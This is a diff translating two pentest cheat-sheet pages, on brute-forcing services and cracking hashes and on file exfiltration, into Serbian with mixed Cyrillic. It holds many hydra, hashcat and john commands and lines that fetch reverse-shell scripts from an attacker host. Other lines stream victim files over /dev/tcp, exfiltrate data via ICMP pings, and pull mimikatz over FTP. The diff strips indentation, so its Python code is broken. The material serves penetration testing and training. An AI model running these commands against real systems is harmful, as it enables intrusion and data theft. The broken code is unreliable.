+nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
 ```
-
 ### POP
-
 ```bash
 hydra -l USERNAME -P /path/to/passwords.txt -f  pop3 -V
 hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f  pop3 -V
@@ -363,9 +290,7 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar
 # SSL
 legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
 ```
-
 ### PostgreSQL
-
 ```bash
 hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt  postgres
 medusa -h  –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
@@ -375,109 +300,81 @@ use auxiliary/scanner/postgres/postgres_login
 nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 
 legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
 ```
-
 ### PPTP
 
-You can download the `.deb` package to install from [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
-
+Možete preuzeti `.deb` paket za instalaciju sa [https://http.kali.org/pool/main/t/thc-pptp-bruter/](https://http.kali.org/pool/main/t/thc-pptp-bruter/)
 ```bash
 sudo dpkg -i thc-pptp-bruter*.deb #Install the package
 cat rockyou.txt | thc-pptp-bruter –u  
 ```
-
 ### RDP
-
 ```bash
 ncrack -vv --user  -P pwds.txt rdp://
 hydra -V -f -L  -P  rdp://
 legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
 ```
-
 ### Redis
-
 ```bash
 msf> use auxiliary/scanner/redis/redis_login
 nmap --script redis-brute -p 6379 
 hydra –P /path/pass.txt redis://: # 6379 is the default
 legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
 ```
-
 ### Rexec
-
 ```bash
 hydra -l  -P  rexec:// -v -V
 ```
-
 ### Rlogin
-
 ```bash
 hydra -l  -P  rlogin:// -v -V
 ```
-
 ### Rsh
-
 ```bash
 hydra -L  rsh:// -v -V
 ```
-
 [http://pentestmonkey.net/tools/misc/rsh-grind](http://pentestmonkey.net/tools/misc/rsh-grind)
 
 ### Rsync
-
 ```bash
 nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 
 ```
-
 ### RTSP
-
 ```bash
 hydra -l root -P passwords.txt  rtsp
 ```
-
 ### SFTP
-
 ```bash
 legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
 # Try keys from a folder
 legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
 ```
-
 ### SNMP
-
 ```bash
 msf> use auxiliary/scanner/snmp/snmp_login
 nmap -sU --script snmp-brute  [--script-args snmp-brute.communitiesdb= ]
 onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 
 hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
 ```
-
 ### SMB
-
 ```bash
 nmap --script smb-brute -p 445 
 hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
 legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup ] [--smb-share ]
 ```
-
 ### SMTP
-
 ```bash
 hydra -l  -P /path/to/passwords.txt  smtp -V
 hydra -l  -P /path/to/passwords.txt -s 587  -S -v -V #Port 587 for SMTP with SSL
 legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism ]
 ```
-
 ### SOCKS
-
 ```bash
 nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 
 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
 # With alternative address
 legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
 ```
-
 ### SQL Server
-
 ```bash
 #Use the NetBIOS name of the machine as domain
 crackmapexec mssql  -d  -u usernames.txt -p passwords.txt
@@ -486,9 +383,7 @@ medusa -h  –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssq
 nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts  #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
 msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
 ```
-
 ### SSH
-
 ```bash
 hydra -l root -P passwords.txt [-t 32]  ssh
 ncrack -p 22 --user root -P passwords.txt  [-T 5]
@@ -498,38 +393,32 @@ legba ssh --username admin --password wordlists/passwords.txt --target localhost
 # Try keys from a folder
 legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
 ```
+#### Slabi SSH ključevi / Predvidljiv PRNG na Debijanu
 
-#### Weak SSH keys / Debian predictable PRNG
+Neki sistemi imaju poznate greške u nasumičnom semenu koje se koristi za generisanje kriptografskog materijala. To može rezultirati dramatično smanjenim prostorom ključeva koji se može bruteforcovati alatima kao što su [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Takođe su dostupni unapred generisani setovi slabih ključeva kao što su [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
 
-Some systems have known flaws in the random seed used to generate cryptographic material. This can result in a dramatically reduced keyspace which can be bruteforced with tools such as [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute). Pre-generated sets of weak keys are also available such as [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
-
-### STOMP (ActiveMQ, RabbitMQ, HornetQ and OpenMQ)
-
-The STOMP text protocol is a widely used messaging protocol that **allows seamless communication and interaction with popular message queueing services** such as RabbitMQ, ActiveMQ, HornetQ, and OpenMQ. It provides a standardized and efficient approach to exchange messages and perform various messaging operations.
+### STOMP (ActiveMQ, RabbitMQ, HornetQ i OpenMQ)
 
+STOMP tekstualni protokol je široko korišćen protokol za razmenu poruka koji **omogućava besprekornu komunikaciju i interakciju sa popularnim servisima za redove poruka** kao što su RabbitMQ, ActiveMQ, HornetQ i OpenMQ. Pruža standardizovan i efikasan pristup razmeni poruka i izvođenju raznih operacija sa porukama.
 ```bash
 legba stomp --target localhost:61613 --username admin --password data/passwords.txt
 ```
-
 ### Telnet
-
 ```bash
 hydra -l root -P passwords.txt [-t 32]  telnet
 ncrack -p 23 --user root -P passwords.txt  [-T 5]
 medusa -u root -P 500-worst-passwords.txt -h  -M telnet
 
 legba telnet \
-    --username admin \
-    --password wordlists/passwords.txt \
-    --target localhost:23 \
-    --telnet-user-prompt "login: " \
-    --telnet-pass-prompt "Password: " \
-    --telnet-prompt ":~$ " \
-    --single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
+--username admin \
+--password wordlists/passwords.txt \
+--target localhost:23 \
+--telnet-user-prompt "login: " \
+--telnet-pass-prompt "Password: " \
+--telnet-prompt ":~$ " \
+--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
 ```
-
 ### VNC
-
 ```bash
 hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s   vnc
 medusa -h  –u root -P /root/Desktop/pass.txt –M vnc
@@ -544,41 +433,29 @@ use auxiliary/scanner/vnc/vnc_login
 set RHOSTS 
 set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
 ```
-
 ### Winrm
-
 ```bash
 crackmapexec winrm  -d  -u usernames.txt -p passwords.txt
 ```
+## Lokalno
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
-
-## Local
-
-### Online cracking databases
+### Online baze podataka za razbijanje
 
 - [~~http://hashtoolkit.com/reverse-hash?~~](http://hashtoolkit.com/reverse-hash?) (MD5 & SHA1)
-- [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 with/without ESS/SSP and with any challenge's value)
-- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashes, WPA2 captures, and archives MSOffice, ZIP, PDF...)
-- [https://crackstation.net/](https://crackstation.net) (Hashes)
+- [https://shuck.sh/get-shucking.php](https://shuck.sh/get-shucking.php) (MSCHAPv2/PPTP-VPN/NetNTLMv1 sa/bez ESS/SSP i sa bilo kojom vrednošću izazova)
+- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) (Hashovi, WPA2 snimci i arhive MSOffice, ZIP, PDF...)
+- [https://crackstation.net/](https://crackstation.net) (Hashovi)
 - [https://md5decrypt.net/](https://md5decrypt.net) (MD5)
-- [https://gpuhash.me/](https://gpuhash.me) (Hashes and file hashes)
-- [https://hashes.org/search.php](https://hashes.org/search.php) (Hashes)
-- [https://www.cmd5.org/](https://www.cmd5.org) (Hashes)
+- [https://gpuhash.me/](https://gpuhash.me) (Hashovi i hashovi fajlova)
+- [https://hashes.org/search.php](https://hashes.org/search.php) (Hashovi)
+- [https://www.cmd5.org/](https://www.cmd5.org) (Hashovi)
 - [https://hashkiller.co.uk/Cracker](https://hashkiller.co.uk/Cracker) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
 - [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) (MD5)
 - [http://reverse-hash-lookup.online-domain-tools.com/](http://reverse-hash-lookup.online-domain-tools.com)
 
-Check this out before trying to brute force a Hash.
+Proverite ovo pre nego što pokušate da brute force-ujete hash.
 
 ### ZIP
-
 ```bash
 #sudo apt-get install fcrackzip
 fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
@@ -594,12 +471,10 @@ john zip.john
 hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
 .\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
 ```
+#### Napad sa poznatim otvorenim tekstom zip
 
-#### Known plaintext zip attack
-
-You need to know the **plaintext** (or part of the plaintext) **of a file contained inside** the encrypted zip. You can check **filenames and size of files contained inside** an encrypted zip running: **`7z l encrypted.zip`**\
-Download [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0)from the releases page.
-
+Morate znati **otvoreni tekst** (ili deo otvorenog teksta) **fajla koji se nalazi unutar** enkriptovanog zip-a. Možete proveriti **imena fajlova i veličinu fajlova koji se nalaze unutar** enkriptovanog zip-a pokretanjem: **`7z l encrypted.zip`**\
+Preuzmite [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0) sa stranice sa izdanjima.
 ```bash
 # You need to create a zip file containing only the file that is inside the encrypted zip
 zip plaintext.zip plaintext.file
@@ -611,9 +486,7 @@ zip plaintext.zip plaintext.file
 ./bkcrack -C  -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
 unzip unlocked.zip #User new_pwd as password
 ```
-
 ### 7z
-
 ```bash
 cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
 ```
@@ -624,9 +497,7 @@ wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo
 apt-get install libcompress-raw-lzma-perl
 ./7z2john.pl file.7z > 7zhash.john
 ```
-
 ### PDF
-
 ```bash
 apt-get install pdfcrack
 pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
@@ -635,13 +506,11 @@ pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
 sudo apt-get install qpdf
 qpdf --password= --decrypt encrypted.pdf plaintext.pdf
 ```
-
 ### PDF Owner Password
 
-To crack a PDF Owner password check this: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
+Da biste probili PDF Owner lozinku, proverite ovo: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/)
 
 ### JWT
-
 ```bash
 git clone https://github.com/Sjord/jwtcrack.git
 cd jwtcrack
@@ -653,17 +522,13 @@ python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5h
 python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
 john jwt.john #It does not work with Kali-John
 ```
-
 ### NTLM cracking
-
 ```bash
 Format:USUARIO:ID:HASH_LM:HASH_NT:::
 john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
 hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
 ```
-
 ### Keepass
-
 ```bash
 sudo apt-get install -y kpcli #Install keepass tools like keepass2john
 keepass2john file.kdbx > hash #The keepass is only using password
@@ -671,30 +536,24 @@ keepass2john -k  file.kdbx > hash # The keepass is also using a f
 #The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
 john --wordlist=/usr/share/wordlists/rockyou.txt hash
 ```
-
 ### Keberoasting
-
 ```bash
 john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
 hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
 ./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
 ```
+### Luks slika
 
-### Lucks image
-
-#### Method 1
-
-Install: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
+#### Metoda 1
 
+Instalirajte: [https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
 ```bash
 bruteforce-luks -f ./list.txt ./backup.img
 cryptsetup luksOpen backup.img mylucksopen
 ls /dev/mapper/ #You should find here the image mylucksopen
 mount /dev/mapper/mylucksopen /mnt
 ```
-
-#### Method 2
-
+#### Metod 2
 ```bash
 cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
 dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
@@ -703,39 +562,33 @@ cryptsetup luksOpen backup.img mylucksopen
 ls /dev/mapper/ #You should find here the image mylucksopen
 mount /dev/mapper/mylucksopen /mnt
 ```
-
-Another Luks BF tutorial: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
+Još jedan Luks BF tutorijal: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
 
 ### Mysql
-
 ```bash
 #John hash format
 :$mysqlna$*
 dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
 ```
-
-### PGP/GPG Private key
-
+### PGP/GPG Privatni ključ
 ```bash
 gpg2john private_pgp.key #This will generate the hash and save it in a file
 john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
 ```
-
 ### Cisco
 
 

 
 ### DPAPI Master Key
 
-Use [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) and then john
+Koristite [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py) i zatim john
 
 ### Open Office Pwd Protected Column
 
-If you have an xlsx file with a column protected by a password you can unprotect it:
-
-- **Upload it to google drive** and the password will be automatically removed
-- To **remove** it **manually**:
+Ako imate xlsx datoteku sa kolonom zaštićenom lozinkom, možete je otključati:
 
+- **Otpremite je na google drive** i lozinka će biti automatski uklonjena
+- Da **uklonite** to **ručno**:
 ```bash
 unzip file.xlsx
 grep -R "sheetProtection" ./*
@@ -744,35 +597,22 @@ hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UV
 # Remove that line and rezip the file
 zip -r file.xls .
 ```
-
-### PFX Certificates
-
+### PFX Sertifikati
 ```bash
 # From https://github.com/Ridter/p12tool
 ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
 # From https://github.com/crackpkcs12/crackpkcs12
 crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
 ```
+## Alati
 
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
-
-## Tools
-
-**Hash examples:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
+**Primeri hešova:** [https://openwall.info/wiki/john/sample-hashes](https://openwall.info/wiki/john/sample-hashes)
 
 ### Hash-identifier
-
 ```bash
 hash-identifier
 > 
 ```
-
 ### Wordlists
 
 - **Rockyou**
@@ -780,40 +620,33 @@ hash-identifier
 - [**Kaonashi**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists)
 - [**Seclists - Passwords**](https://github.com/danielmiessler/SecLists/tree/master/Passwords)
 
-### **Wordlist Generation Tools**
-
-- [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Advanced keyboard-walk generator with configurable base chars, keymap and routes.
+### **Alati za generisanje rečnika**
 
+- [**kwprocessor**](https://github.com/hashcat/kwprocessor)**:** Napredni generator za šetnju tastaturom sa konfigurisanim osnovnim karakterima, rasporedom tastera i rutama.
 ```bash
 kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
 ```
+### John mutacija
 
-### John mutation
-
-Read _**/etc/john/john.conf**_ and configure it
-
+Pročitajte _**/etc/john/john.conf**_ i konfigurišite ga
 ```bash
 john --wordlist=words.txt --rules --stdout > w_mutated.txt
 john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
 ```
-
 ### Hashcat
 
-#### Hashcat attacks
+#### Hashcat napadi
 
-- **Wordlist attack** (`-a 0`) with rules
-
-**Hashcat** already comes with a **folder containing rules** but you can find [**other interesting rules here**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
+- **Napad rečnika** (`-a 0`) sa pravilima
 
+**Hashcat** već dolazi sa **folderom koji sadrži pravila** ali možete pronaći [**druga zanimljiva pravila ovde**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules).
 ```
 hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
 ```
+- **Wordlist combinator** napad
 
-- **Wordlist combinator** attack
-
-It's possible to **combine 2 wordlists into 1** with hashcat.\
-If list 1 contained the word **"hello"** and the second contained 2 lines with the words **"world"** and **"earth"**. The words `helloworld` and `helloearth` will be generated.
-
+Moguće je **kombinovati 2 rečnika u 1** sa hashcat-om.\
+Ako je lista 1 sadržala reč **"hello"** a druga je sadržala 2 reda sa rečima **"world"** i **"earth"**. Reči `helloworld` i `helloearth` će biti generisane.
 ```bash
 # This will combine 2 wordlists
 hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
@@ -824,9 +657,7 @@ hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
 ## hello-earth!
 hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
 ```
-
 - **Mask attack** (`-a 3`)
-
 ```bash
 # Mask attack with simple mask
 hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
@@ -858,9 +689,7 @@ hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
 ## Use it to crack the password
 hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
 ```
-
-- Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) attack
-
+- Wordlist + Mask (`-a 6`) / Mask + Wordlist (`-a 7`) napad
 ```bash
 # Mask numbers will be appended to each word in the wordlist
 hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
@@ -868,47 +697,30 @@ hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
 # Mask numbers will be prepended to each word in the wordlist
 hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
 ```
-
-#### Hashcat modes
-
+#### Hashcat modusi
 ```bash
 hashcat --example-hashes | grep -B1 -A2 "NTLM"
 ```
-
-Cracking Linux Hashes - /etc/shadow file
-
+Kršenje Linux hešova - /etc/shadow datoteka
 ```
- 500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
+500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
 3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
 7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
 1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
 ```
-
-Cracking Windows Hashes
-
+Razbijanje Windows hešova
 ```
 3000 | LM                                               | Operating-Systems
 1000 | NTLM                                             | Operating-Systems
 ```
-
-Cracking Common Application Hashes
-
+Razbijanje uobičajenih hešova aplikacija
 ```
-  900 | MD4                                              | Raw Hash
-    0 | MD5                                              | Raw Hash
- 5100 | Half MD5                                         | Raw Hash
-  100 | SHA1                                             | Raw Hash
+900 | MD4                                              | Raw Hash
+0 | MD5                                              | Raw Hash
+5100 | Half MD5                                         | Raw Hash
+100 | SHA1                                             | Raw Hash
 10800 | SHA-384                                          | Raw Hash
- 1400 | SHA-256                                          | Raw Hash
- 1700 | SHA-512                                          | Raw Hash
+1400 | SHA-256                                          | Raw Hash
+1700 | SHA-512                                          | Raw Hash
 ```
-
 {{#include ../banners/hacktricks-training.md}}
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=brute-force" %}
diff --git a/src/generic-hacking/exfiltration.md b/src/generic-hacking/exfiltration.md
index 2e5c0c1dd..2c9ebd60d 100644
--- a/src/generic-hacking/exfiltration.md
+++ b/src/generic-hacking/exfiltration.md
@@ -1,40 +1,33 @@
-# Exfiltration
+# Ekstrakcija
 
 {{#include ../banners/hacktricks-training.md}}
 
-## Commonly whitelisted domains to exfiltrate information
+## Uobičajeni dozvoljeni domeni za ekstrakciju informacija
 
-Check [https://lots-project.com/](https://lots-project.com/) to find commonly whitelisted domains that can be abused
+Proverite [https://lots-project.com/](https://lots-project.com/) da biste pronašli uobičajene dozvoljene domeine koji se mogu zloupotrebiti
 
-## Copy\&Paste Base64
+## Kopiraj\&Zalepi Base64
 
 **Linux**
-
 ```bash
 base64 -w0  #Encode file
 base64 -d file #Decode file
 ```
-
 **Windows**
-
 ```
 certutil -encode payload.dll payload.b64
 certutil -decode payload.b64 payload.dll
 ```
-
 ## HTTP
 
 **Linux**
-
 ```bash
 wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
 wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm
 curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
 fetch 10.10.14.14:8000/shell.py #FreeBSD
 ```
-
 **Windows**
-
 ```bash
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
 bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf
@@ -49,13 +42,11 @@ Start-BitsTransfer -Source $url -Destination $output
 #OR
 Start-BitsTransfer -Source $url -Destination $output -Asynchronous
 ```
-
-### Upload files
+### Upload fajlova
 
 - [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
-- [**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
-- Python module [uploadserver](https://pypi.org/project/uploadserver/):
-
+- [**SimpleHttpServer štampanje GET i POST (takođe zaglavlja)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)
+- Python modul [uploadserver](https://pypi.org/project/uploadserver/):
 ```bash
 # Listen to files
 python3 -m pip install --user uploadserver
@@ -68,9 +59,7 @@ curl -X POST http://HOST/upload -H -F 'files=@file.txt'
 # With basic auth:
 # curl -X POST http://HOST/upload -H -F 'files=@file.txt' -u hello:world
 ```
-
 ### **HTTPS Server**
-
 ```python
 # from https://gist.github.com/dergachev/7028596
 # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
@@ -105,31 +94,25 @@ from urllib.parse import quote
 app = Flask(__name__)
 @app.route('/')
 def root():
-    print(request.get_json())
-    return "OK"
+print(request.get_json())
+return "OK"
 if __name__ == "__main__":
-    app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
+app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
 ###
 ```
-
 ## FTP
 
-### FTP server (python)
-
+### FTP сервер (python)
 ```bash
 pip3 install pyftpdlib
 python3 -m pyftpdlib -p 21
 ```
-
-### FTP server (NodeJS)
-
+### FTP сервер (NodeJS)
 ```
 sudo npm install -g ftp-srv --save
 ftp-srv ftp://0.0.0.0:9876 --root /tmp
 ```
-
-### FTP server (pure-ftp)
-
+### FTP сервер (pure-ftp)
 ```bash
 apt-get update && apt-get install pure-ftp
 ```
@@ -147,9 +130,7 @@ mkdir -p /ftphome
 chown -R ftpuser:ftpgroup /ftphome/
 /etc/init.d/pure-ftpd restart
 ```
-
-### **Windows** client
-
+### **Windows** клијент
 ```bash
 #Work well with python. With pure-ftp use fusr:ftp
 echo open 10.11.0.41 21 > ftp.txt
@@ -160,37 +141,31 @@ echo GET mimikatz.exe >> ftp.txt
 echo bye >> ftp.txt
 ftp -n -v -s:ftp.txt
 ```
-
 ## SMB
 
-Kali as server
-
+Kali kao server
 ```bash
 kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
 kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
 #For new Win10 versions
 impacket-smbserver -smb2support -user test -password test test `pwd`
 ```
-
-Or create a smb share **using samba**:
-
+Ili kreirajte smb deljenje **koristeći sambu**:
 ```bash
 apt-get install samba
 mkdir /tmp/smb
 chmod 777 /tmp/smb
 #Add to the end of /etc/samba/smb.conf this:
 [public]
-    comment = Samba on Ubuntu
-    path = /tmp/smb
-    read only = no
-    browsable = yes
-    guest ok = Yes
+comment = Samba on Ubuntu
+path = /tmp/smb
+read only = no
+browsable = yes
+guest ok = Yes
 #Start samba
 service smbd restart
 ```
-
 Windows
-
 ```bash
 CMD-Wind> \\10.10.14.14\path\to\exe
 CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
@@ -198,54 +173,42 @@ CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentia
 WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
 WindPS-2> cd new_disk:
 ```
-
 ## SCP
 
-The attacker has to have SSHd running.
-
+Napadač mora imati pokrenut SSHd.
 ```bash
 scp @:/
 ```
-
 ## SSHFS
 
-If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
-
+Ako žrtva ima SSH, napadač može montirati direktorijum sa žrtve na napadača.
 ```bash
 sudo apt-get install sshfs
 sudo mkdir /mnt/sshfs
 sudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/
 ```
-
 ## NC
-
 ```bash
 nc -lvnp 4444 > new_file
 nc -vn  4444 < exfil_file
 ```
-
 ## /dev/tcp
 
-### Download file from victim
-
+### Preuzmi datoteku sa žrtve
 ```bash
 nc -lvnp 80 > file #Inside attacker
 cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
 ```
-
-### Upload file to victim
-
+### Učitajte datoteku na žrtvu
 ```bash
 nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
 # Inside victim
 exec 6< /dev/tcp/10.10.10.10/4444
 cat <&6 > file.txt
 ```
-
-thanks to **@BinaryShadow\_**
+hvala **@BinaryShadow\_**
 
 ## **ICMP**
-
 ```bash
 # To exfiltrate the content of a file via pings you can do:
 xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done
@@ -256,64 +219,50 @@ xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line   
 ```
-
-In **victim**, connect to the Kali server:
-
+U **žrtvi**, povežite se na Kali server:
 ```bash
 tftp -i  get nc.exe
 ```
-
 ## PHP
 
-Download a file with a PHP oneliner:
-
+Preuzmite datoteku sa PHP oneliner-om:
 ```bash
 echo "" > down2.php
 ```
-
